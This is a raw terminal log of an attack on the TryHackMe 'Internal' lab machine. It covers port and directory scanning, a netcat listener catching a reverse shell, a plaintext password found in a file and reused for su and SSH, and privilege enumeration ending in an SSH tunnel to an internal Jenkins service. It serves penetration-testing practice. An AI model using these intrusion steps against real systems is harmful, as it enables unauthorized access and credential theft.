┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~]
└─$ Documents/TryHackMe/ && mkdir Internal && Internal 
                                                                                                                                                                                                                                       
┌──(kali㉿kali)-[~/Documents/TryHackMe/Internal]
└─$ nmap -sC -sV -Pn -p- 10.10.227.26 -oN nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 12:43 EST
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 89.42% done; ETC: 12:44 (0:00:04 remaining)
Nmap scan report for 10.10.227.26
Host is up (0.038s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.34 seconds
                                                                                                                  
┌──(kali㉿kali)-[~/Documents/TryHackMe/Internal]
└─$ gobuster dir -u http://10.10.227.26/ -w /usr/share/wordlists/dirb/common.txt -o gobuster
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.227.26/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/21 12:45:40 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/blog                 (Status: 301) [Size: 311] [--> http://10.10.227.26/blog/]
/.htaccess            (Status: 403) [Size: 277]                                
/index.html           (Status: 200) [Size: 10918]                              
/javascript           (Status: 301) [Size: 317] [--> http://10.10.227.26/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://10.10.227.26/phpmyadmin/]
/server-status        (Status: 403) [Size: 277]                                      
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.227.26/wordpress/] 
                                                                                     
===============================================================
2021/12/21 12:45:51 Finished
===============================================================

┌──(kali㉿kali)-[~/Documents/TryHackMe/Internal]
└─$ dirsearch -u http://internal.thm -e php,html,txt,zip,tar,bak,js -x 400,500 -r -t 100                      2 ⨯

  _|. _ _  _  _  _ _|_    v0.4.1                                                                                  
 (_||| _) (/_(_|| (_| )                                                                                           
                                                                                                                  
Extensions: php, html, txt, zip, tar, bak, js | HTTP method: GET | Threads: 100 | Wordlist size: 11869

Output File: /home/kali/.dirsearch/reports/internal.thm/_21-12-21_13-30-20.txt

Error Log: /home/kali/.dirsearch/logs/errors-21-12-21_13-30-20.log

Target: http://internal.thm/
                                                                                                                  
[13:30:20] Starting: 
[13:30:22] 403 -  277B  - /.ht_wsr.txt                                            
[13:30:22] 403 -  277B  - /.htaccess.bak1
[13:30:23] 403 -  277B  - /.htaccess.orig
[13:30:23] 403 -  277B  - /.htaccess.sample
[13:30:23] 403 -  277B  - /.htaccess.save
[13:30:23] 403 -  277B  - /.htaccess_extra
[13:30:23] 403 -  277B  - /.htaccess_orig
[13:30:23] 403 -  277B  - /.htaccess_sc
[13:30:23] 403 -  277B  - /.htaccessOLD
[13:30:23] 403 -  277B  - /.htaccessBAK
[13:30:23] 403 -  277B  - /.htaccessOLD2
[13:30:23] 403 -  277B  - /.htm            
[13:30:23] 403 -  277B  - /.html
[13:30:23] 403 -  277B  - /.htpasswd_test
[13:30:23] 403 -  277B  - /.htpasswds
[13:30:23] 403 -  277B  - /.httr-oauth
[13:30:23] 403 -  277B  - /.php                                                   
[13:30:30] 301 -  311B  - /blog  ->  http://internal.thm/blog/     (Added to queue) 
[13:30:32] 200 -    4KB - /blog/wp-login.php                                                             
[13:30:32] 200 -   53KB - /blog/                                               
[13:30:34] 200 -   11KB - /index.html                                                
[13:30:34] 301 -  317B  - /javascript  ->  http://internal.thm/javascript/     (Added to queue)
[13:30:36] 200 -   13KB - /phpmyadmin/doc/html/index.html                                                      
[13:30:36] 301 -  317B  - /phpmyadmin  ->  http://internal.thm/phpmyadmin/     (Added to queue)
[13:30:37] 200 -   10KB - /phpmyadmin/                                                  
[13:30:37] 200 -   10KB - /phpmyadmin/index.php             
[13:30:38] 403 -  277B  - /server-status                                                                      
[13:30:38] 403 -  277B  - /server-status/     (Added to queue)
[13:30:40] 200 -    4KB - /wordpress/wp-login.php                                                                
[13:30:41] Starting: blog/                                                                                    
[13:30:42] 403 -  277B  - /blog/.ht_wsr.txt                                                 
[13:30:42] 403 -  277B  - /blog/.htaccess_orig                       
[13:30:42] 403 -  277B  - /blog/.htaccess.sample
[13:30:42] 403 -  277B  - /blog/.htm                     
[13:30:42] 403 -  277B  - /blog/.htaccess.bak1
[13:30:42] 403 -  277B  - /blog/.htaccess_sc
[13:30:42] 403 -  277B  - /blog/.html
[13:30:42] 403 -  277B  - /blog/.htaccess_extra
[13:30:42] 403 -  277B  - /blog/.htaccess.orig      
[13:30:42] 403 -  277B  - /blog/.htaccessOLD               
[13:30:42] 403 -  277B  - /blog/.htaccessBAK                   
[13:30:42] 403 -  277B  - /blog/.htaccess.save           
[13:30:42] 403 -  277B  - /blog/.htaccessOLD2                
[13:30:42] 403 -  277B  - /blog/.htpasswds                                                  
[13:30:42] 403 -  277B  - /blog/.httr-oauth                           
[13:30:42] 403 -  277B  - /blog/.htpasswd_test                    
[13:30:42] 403 -  277B  - /blog/.php                                                 
[13:30:53] 301 -    0B  - /blog/index.php  ->  http://internal.thm/blog/                                       
[13:30:53] 200 -   19KB - /blog/license.txt                                                      
[13:30:57] 200 -    7KB - /blog/readme.html                                            
[13:30:59] 301 -  320B  - /blog/wp-admin  ->  http://internal.thm/blog/wp-admin/     (Added to queue)            
[13:30:59] 301 -  322B  - /blog/wp-content  ->  http://internal.thm/blog/wp-content/     (Added to queue)
[13:30:59] 200 -    0B  - /blog/wp-content/                                
[13:30:59] 200 -    0B  - /blog/wp-config.php                                                    
[13:30:59] 301 -  323B  - /blog/wp-includes  ->  http://internal.thm/blog/wp-includes/     (Added to queue)   
[13:31:00] 403 -  277B  - /blog/wp-includes/                          
[13:31:00] 200 -    0B  - /blog/wp-cron.php                                  
[13:31:00] 200 -    4KB - /blog/wp-login.php
[13:31:00] 302 -    0B  - /blog/wp-signup.php  ->  http://internal.thm/blog/wp-login.php?action=register
[13:31:00] 302 -    0B  - /blog/wp-admin/  ->  http://internal.thm/blog/wp-login.php?redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&reauth=1
[13:31:00] 200 -    1KB - /blog/wp-admin/install.php            
[13:31:00] 405 -   42B  - /blog/xmlrpc.php 

> WPSCAN not working

┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~]
└─$ Documents/TryHackMe/Internal       
                                                                                                                  
┌──(kali㉿kali)-[~/Documents/TryHackMe/Internal]
└─$ nc -lvnp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.17.25.
Ncat: Connection from 10.10.17.25:38892.
Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 18:37:40 up 13 min,  0 users,  load average: 0.17, 0.12, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@internal:/$ whoami
whoami
www-data
www-data@internal:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@internal:/$ pwd
pwd
/
www-data@internal:/$ ls -l
ls -l
total 1847392
drwxr-xr-x   2 root root       4096 Aug  3  2020 bin
drwxr-xr-x   4 root root       4096 Aug  3  2020 boot
drwxr-xr-x   2 root root       4096 Aug  3  2020 cdrom
drwxr-xr-x  18 root root       3760 Dec 21 18:23 dev
drwxr-xr-x 102 root root       4096 Aug  3  2020 etc
drwxr-xr-x   3 root root       4096 Aug  3  2020 home
lrwxrwxrwx   1 root root         34 Aug  3  2020 initrd.img -> boot/initrd.img-4.15.0-112-generic
lrwxrwxrwx   1 root root         34 Aug  3  2020 initrd.img.old -> boot/initrd.img-4.15.0-112-generic
drwxr-xr-x  23 root root       4096 Aug  3  2020 lib
drwxr-xr-x   2 root root       4096 Aug  3  2020 lib64
drwx------   2 root root      16384 Aug  3  2020 lost+found
drwxr-xr-x   2 root root       4096 Feb  3  2020 media
drwxr-xr-x   2 root root       4096 Feb  3  2020 mnt
drwxr-xr-x   3 root root       4096 Aug  3  2020 opt
dr-xr-xr-x 146 root root          0 Dec 21 18:23 proc
drwx------   7 root root       4096 Aug  3  2020 root
drwxr-xr-x  30 root root       1000 Dec 21 18:25 run
drwxr-xr-x   2 root root      12288 Aug  3  2020 sbin
drwxr-xr-x   4 root root       4096 Aug  3  2020 snap
drwxr-xr-x   2 root root       4096 Feb  3  2020 srv
-rw-------   1 root root 1891631104 Aug  3  2020 swap.img
dr-xr-xr-x  13 root root          0 Dec 21 18:23 sys
drwxrwxrwt   2 root root       4096 Dec 21 18:33 tmp
drwxr-xr-x  10 root root       4096 Feb  3  2020 usr
drwxr-xr-x  14 root root       4096 Aug  3  2020 var
lrwxrwxrwx   1 root root         31 Aug  3  2020 vmlinuz -> boot/vmlinuz-4.15.0-112-generic
lrwxrwxrwx   1 root root         31 Aug  3  2020 vmlinuz.old -> boot/vmlinuz-4.15.0-112-generic
www-data@internal:/$ cd home
cd home
www-data@internal:/home$ ls
ls
aubreanna
www-data@internal:/home$ cd aubreanna
cd aubreanna
bash: cd: aubreanna: Permission denied
www-data@internal:/home$ cd opt     
cd opt
bash: cd: opt: No such file or directory
www-data@internal:/home$ cd ../opt
cd ../opt
www-data@internal:/opt$ ls
ls
containerd  wp-save.txt
www-data@internal:/opt$ cat wp-save.txt
cat wp-save.txt
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123
www-data@internal:/opt$ su aubreanna
su aubreanna
Password: bubb13guM!@#123

aubreanna@internal:/opt$ cd /home/aubreanna
cd /home/aubreanna
aubreanna@internal:~$ cat user.txt
cat user.txt
THM{int3rna1_fl4g_1}
aubreanna@internal:~$ 


┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~/Documents/TryHackMe/Internal]
└─$ ssh aubreanna@internal.thm
The authenticity of host 'internal.thm (10.10.17.25)' can't be established.
ED25519 key fingerprint is SHA256:seRYczfyDrkweytt6CJT/aBCJZMIcvlYYrTgoGxeHs4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'internal.thm' (ED25519) to the list of known hosts.
aubreanna@internal.thm's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Dec 21 18:45:32 UTC 2021

  System load:  0.08              Processes:              134
  Usage of /:   65.3% of 8.79GB   Users logged in:        0
  Memory usage: 39%               IP address for eth0:    10.10.17.25
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There are 2 zombie processes.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Aug  3 19:56:19 2020 from 10.6.2.56
aubreanna@internal:~$ ls -l
total 12
-rwx------ 1 aubreanna aubreanna   55 Aug  3  2020 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 snap
-rwx------ 1 aubreanna aubreanna   21 Aug  3  2020 user.txt
aubreanna@internal:~$ cat user.txt
THM{int3rna1_fl4g_1}
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
aubreanna@internal:~$ docker images
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.40/images/json: dial unix /var/run/docker.sock: connect: permission denied
aubreanna@internal:~$ sudo -l
[sudo] password for aubreanna: 
Sorry, user aubreanna may not run sudo on internal.
aubreanna@internal:~$ find / -type f -user root -perm -4000 2> /dev/null
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/su
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
aubreanna@internal:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:43729         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 10.10.17.25:38892       10.8.28.133:4444        ESTABLISHED off (0.00/0/0)
tcp        0    324 10.10.17.25:22          10.8.28.133:47678       ESTABLISHED on (0.05/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47126       ESTABLISHED on (0.20/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40474       TIME_WAIT   timewait (2.89/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47130       ESTABLISHED on (0.21/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47120       ESTABLISHED on (0.20/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40432       TIME_WAIT   timewait (1.08/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47112       ESTABLISHED on (0.20/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47066       ESTABLISHED on (0.20/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40492       TIME_WAIT   timewait (3.31/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:46956       TIME_WAIT   timewait (59.66/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40518       TIME_WAIT   timewait (3.20/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47068       ESTABLISHED on (0.23/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:42664       TIME_WAIT   timewait (22.88/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47116       ESTABLISHED on (0.21/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47094       ESTABLISHED on (0.22/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47122       ESTABLISHED on (0.21/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:46468       TIME_WAIT   timewait (52.05/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47106       ESTABLISHED on (0.22/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40546       TIME_WAIT   timewait (4.60/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47108       ESTABLISHED on (0.21/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:47098       ESTABLISHED keepalive (7199.20/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40486       TIME_WAIT   timewait (3.30/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40520       TIME_WAIT   timewait (6.16/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47014       ESTABLISHED on (0.21/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47096       ESTABLISHED on (0.22/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47056       ESTABLISHED on (0.22/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:42994       TIME_WAIT   timewait (26.56/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47064       ESTABLISHED on (0.22/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:47048       ESTABLISHED keepalive (7198.52/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40510       TIME_WAIT   timewait (3.49/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40330       TIME_WAIT   timewait (1.38/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47128       ESTABLISHED on (0.22/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47082       ESTABLISHED on (0.22/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:40490       TIME_WAIT   timewait (2.88/0/0)
tcp6       0    435 10.10.17.25:80          10.8.28.133:47114       ESTABLISHED on (0.22/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:47124       ESTABLISHED keepalive (7199.72/0/0)
tcp6       0      0 10.10.17.25:80          10.8.28.133:46924       TIME_WAIT   timewait (59.17/0/0)
udp        0      0 127.0.0.53:53           0.0.0.0:*                           off (0.00/0/0)
udp        0      0 10.10.17.25:68          0.0.0.0:*                           off (0.00/0/0)
raw6       0      0 :::58                   :::*                    7           off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node   Path
unix  2      [ ]         DGRAM                    65152    /run/user/1000/systemd/notify
unix  2      [ ACC ]     SEQPACKET  LISTENING     14901    /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     65155    /run/user/1000/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     65159    /run/user/1000/gnupg/S.gpg-agent.extra
unix  2      [ ACC ]     STREAM     LISTENING     65160    /run/user/1000/gnupg/S.gpg-agent.ssh
unix  2      [ ACC ]     STREAM     LISTENING     65161    /run/user/1000/gnupg/S.gpg-agent.browser
unix  2      [ ACC ]     STREAM     LISTENING     65162    /run/user/1000/snapd-session-agent.socket
unix  2      [ ACC ]     STREAM     LISTENING     65163    /run/user/1000/gnupg/S.dirmngr
unix  2      [ ACC ]     STREAM     LISTENING     65164    /run/user/1000/gnupg/S.gpg-agent
unix  3      [ ]         DGRAM                    14882    /run/systemd/notify
unix  2      [ ACC ]     STREAM     LISTENING     14885    /run/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     14890    /run/lvm/lvmetad.socket
unix  7      [ ]         DGRAM                    14899    /run/systemd/journal/dev-log
unix  2      [ ACC ]     STREAM     LISTENING     14903    /run/systemd/journal/stdout
unix  10     [ ]         DGRAM                    14905    /run/systemd/journal/socket
unix  2      [ ]         DGRAM                    15015    /run/systemd/journal/syslog
unix  2      [ ACC ]     STREAM     LISTENING     24097    @/containerd-shim/1c5236578d000676eca92a80a429dfaacfdd004e11541cdddc596dbaaa758907.sock@
unix  2      [ ACC ]     STREAM     LISTENING     15190    /run/lvm/lvmpolld.socket
unix  2      [ ACC ]     STREAM     LISTENING     18891    /var/lib/lxd/unix.socket
unix  2      [ ACC ]     STREAM     LISTENING     22948    /run/containerd/containerd.sock.ttrpc
unix  2      [ ACC ]     STREAM     LISTENING     22949    /run/containerd/containerd.sock
unix  2      [ ACC ]     STREAM     LISTENING     23113    /var/run/mysqld/mysqld.sock
unix  2      [ ACC ]     STREAM     LISTENING     23104    /var/run/docker/metrics.sock
unix  2      [ ACC ]     STREAM     LISTENING     23738    /var/run/docker/libnetwork/3fbe0d47c467.sock
unix  2      [ ACC ]     STREAM     LISTENING     18860    @ISCSIADM_ABSTRACT_NAMESPACE
unix  2      [ ACC ]     STREAM     LISTENING     18861    /var/run/docker.sock
unix  2      [ ACC ]     STREAM     LISTENING     18841    /run/snapd.socket
unix  2      [ ACC ]     STREAM     LISTENING     18843    /run/snapd-snap.socket
unix  2      [ ACC ]     STREAM     LISTENING     18868    /run/acpid.socket
unix  2      [ ACC ]     STREAM     LISTENING     18902    /var/run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     18919    /run/uuidd/request
unix  3      [ ]         STREAM     CONNECTED     21880    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     23109    
unix  2      [ ]         DGRAM                    23012    
unix  3      [ ]         STREAM     CONNECTED     22001    /var/run/dbus/system_bus_socket
unix  2      [ ]         DGRAM                    18474    
unix  3      [ ]         STREAM     CONNECTED     23110    /run/containerd/containerd.sock
unix  3      [ ]         STREAM     CONNECTED     20432    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     23107    /run/containerd/containerd.sock
unix  2      [ ]         DGRAM                    68060    
unix  3      [ ]         STREAM     CONNECTED     21863    
unix  3      [ ]         DGRAM                    17442    
unix  3      [ ]         STREAM     CONNECTED     15523    
unix  3      [ ]         STREAM     CONNECTED     18212    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     21395    /run/systemd/journal/stdout
unix  2      [ ]         DGRAM                    18235    
unix  2      [ ]         DGRAM                    15386    
unix  3      [ ]         STREAM     CONNECTED     20333    
unix  3      [ ]         STREAM     CONNECTED     20742    
unix  3      [ ]         STREAM     CONNECTED     19627    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     15956    
unix  3      [ ]         STREAM     CONNECTED     22015    /var/run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    18248    
unix  3      [ ]         STREAM     CONNECTED     18444    
unix  3      [ ]         DGRAM                    17257    
unix  3      [ ]         STREAM     CONNECTED     23106    
unix  3      [ ]         DGRAM                    18247    
unix  3      [ ]         STREAM     CONNECTED     22340    /var/run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    18245    
unix  3      [ ]         STREAM     CONNECTED     20258    
unix  3      [ ]         STREAM     CONNECTED     22180    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     21107    
unix  3      [ ]         STREAM     CONNECTED     41797    
unix  3      [ ]         STREAM     CONNECTED     19626    
unix  3      [ ]         STREAM     CONNECTED     24113    @/containerd-shim/1c5236578d000676eca92a80a429dfaacfdd004e11541cdddc596dbaaa758907.sock@
unix  3      [ ]         DGRAM                    18246    
unix  3      [ ]         STREAM     CONNECTED     18211    
unix  3      [ ]         DGRAM                    17258    
unix  3      [ ]         STREAM     CONNECTED     20334    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     20744    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     18904    
unix  3      [ ]         STREAM     CONNECTED     20335    /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     22000    
unix  3      [ ]         STREAM     CONNECTED     24102    
unix  3      [ ]         STREAM     CONNECTED     41798    /var/run/mysqld/mysqld.sock
unix  3      [ ]         STREAM     CONNECTED     22179    
unix  3      [ ]         STREAM     CONNECTED     22339    
unix  3      [ ]         STREAM     CONNECTED     22014    
unix  2      [ ]         DGRAM                    22006    
unix  3      [ ]         STREAM     CONNECTED     19688    /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     20428    
unix  3      [ ]         STREAM     CONNECTED     18445    /run/systemd/journal/stdout
unix  2      [ ]         DGRAM                    15833    
unix  3      [ ]         STREAM     CONNECTED     17332    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     21000    
unix  2      [ ]         DGRAM                    64954    
unix  2      [ ]         DGRAM                    17436    
unix  2      [ ]         DGRAM                    15961    
unix  3      [ ]         STREAM     CONNECTED     21390    
unix  3      [ ]         STREAM     CONNECTED     21116    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     19136    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     21635    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    14883    
unix  3      [ ]         STREAM     CONNECTED     68505    
unix  3      [ ]         STREAM     CONNECTED     15957    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    14884    
unix  3      [ ]         DGRAM                    65153    
unix  3      [ ]         STREAM     CONNECTED     19135    
unix  3      [ ]         STREAM     CONNECTED     19766    
unix  3      [ ]         STREAM     CONNECTED     18905    
unix  3      [ ]         STREAM     CONNECTED     19630    
unix  3      [ ]         DGRAM                    17441    
unix  3      [ ]         STREAM     CONNECTED     19686    
unix  3      [ ]         DGRAM                    65154    
unix  2      [ ]         DGRAM                    19685    
unix  3      [ ]         STREAM     CONNECTED     65066    
unix  3      [ ]         STREAM     CONNECTED     17330    
unix  3      [ ]         STREAM     CONNECTED     68506    
unix  3      [ ]         STREAM     CONNECTED     19687    
unix  3      [ ]         STREAM     CONNECTED     22315    /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     65068    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     19689    /var/run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    17440    
unix  2      [ ]         DGRAM                    19649    
unix  2      [ ]         DGRAM                    65116    
unix  3      [ ]         STREAM     CONNECTED     22314    
unix  3      [ ]         STREAM     CONNECTED     15826    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     19767    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     19690    /var/run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    15965    
unix  3      [ ]         DGRAM                    17439    
unix  2      [ ]         DGRAM                    65104    
unix  3      [ ]         DGRAM                    15966    
aubreanna@internal:~$ exit
logout
Connection to internal.thm closed.


┌──(kali㉿kali)-[~/Documents/TryHackMe/Internal]
└─$ ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm
aubreanna@internal.thm's password: 
Permission denied, please try again.
aubreanna@internal.thm's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Dec 21 18:52:37 UTC 2021

  System load:  0.0               Processes:              135
  Usage of /:   66.0% of 8.79GB   Users logged in:        0
  Memory usage: 48%               IP address for eth0:    10.10.17.25
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
